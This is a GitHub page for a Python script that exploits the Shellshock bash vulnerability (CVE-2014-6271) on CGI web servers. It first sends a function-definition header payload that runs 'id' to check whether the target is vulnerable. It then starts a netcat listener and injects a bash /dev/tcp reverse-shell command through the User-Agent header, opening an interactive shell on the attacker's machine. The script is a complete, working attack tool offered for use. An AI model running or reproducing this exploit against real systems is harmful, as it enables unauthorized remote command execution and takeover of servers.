-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathshellshock_exploit.py
executable file
·95 lines (64 loc) · 3.97 KB
/
shellshock_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#!/usr/bin/env python3
# Coded by: Jsmoreira02
# https://github.com/Jsmoreira02
from requests import get
from argparse import ArgumentParser
from subprocess import Popen
from time import sleep
code_cyan_bold = "\033[96;1m"
code_green_bold = "\033[92;1m"
code_red_bold = "\033[91;1m"
code_reset = "\033[0m"
def arguments():
parser = ArgumentParser(description="Exploit [CVE-2014-6271]", epilog="Usage: python3 exploit.py http://target/cgi-bin/test.cgi hackerIP 443")
parser.add_argument('url', metavar="<URL>", type=str, help="URL path to shellshock vulnerability")
parser.add_argument('LHOST', metavar="<LHOST>", type=str, help="Local HOST")
parser.add_argument('LPORT', metavar="<LPORT>", type=str, help="Local PORT")
args = parser.parse_args()
return args.url, args.LHOST, args.LPORT
def logo():
banner = "\n ██████ ██░ ██ ▓█████ ██▓ ██▓ ██████ ██░ ██ ▒█████ ▄████▄ ██ ▄█▀\n"
banner += " ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒ ▒██ ▒ ▓██░ ██▒▒██▒ ██▒▒██▀ ▀█ ██▄█▒\n"
banner += " ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░ ░ ▓██▄ ▒██▀▀██░▒██░ ██▒▒▓█ ▄ ▓███▄░\n"
banner += " ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░ ▒ ██▒░▓█ ░██ ▒██ ██░▒▓▓▄ ▄██▒▓██ █▄\n"
banner += " ▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒▒██████▒▒░▓█▒░██▓░ ████▓▒░▒ ▓███▀ ░▒██▒ █▄\n"
banner += " ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░ ▒░▒░▒░ ░ ░▒ ▒ ░▒ ▒▒ ▓▒\n"
banner += " ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ▒ ▒░ ░ ▒ ░ ░▒ ▒░\n"
banner += " ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ▒ ░ ░ ░░ ░\n"
return banner
def check_CVE(url):
headers = {"User-Agent": "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"}
checking = get(url=url, headers=headers)
if "uid=33(www-data) gid=33(www-data) groups=33(www-data)" in checking.text:
return f"{code_green_bold}[!]{code_reset}" + " The target is vulnerable!\n"
else:
return f"{code_red_bold}[X]{code_reset}" + " The target don't appear to be vulnerable\n"
def exploit(url, lhost, lport):
info = "[CVE-2014-6271] exploitable vulnerability in the Apache HTTP Server"
print(" \n" + "=" * 85)
print(f"{code_cyan_bold}{logo()}{code_reset}")
print(info.center(82) + "\n")
print("=" * 85 + "\n")
payload = f"/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
headers = {"User-Agent": "() { :; };" + payload}
sleep(1)
print(check_CVE(url))
try:
Popen(["nc","-lp",f"{lport}"])
sleep(1)
print("=" * 35)
print("Spawning your shell...")
print("=" * 35 + "\n")
get(url=url, headers=headers)
except KeyboardInterrupt:
return f"\n\n{code_green_bold}Ctrl+C detected! Finished!{code_reset}"
return f"\n\n{code_green_bold}Finished!{code_reset}"
def main():
target, lhost, lport = arguments()
if get(url=target).status_code == 200:
print(exploit(target, lhost, lport))
else:
return f"\n{code_red_bold}[X]{code_reset} Invalid URL! Are you sure this is the correct path?\n"
return ""
if __name__ == '__main__':
print(main())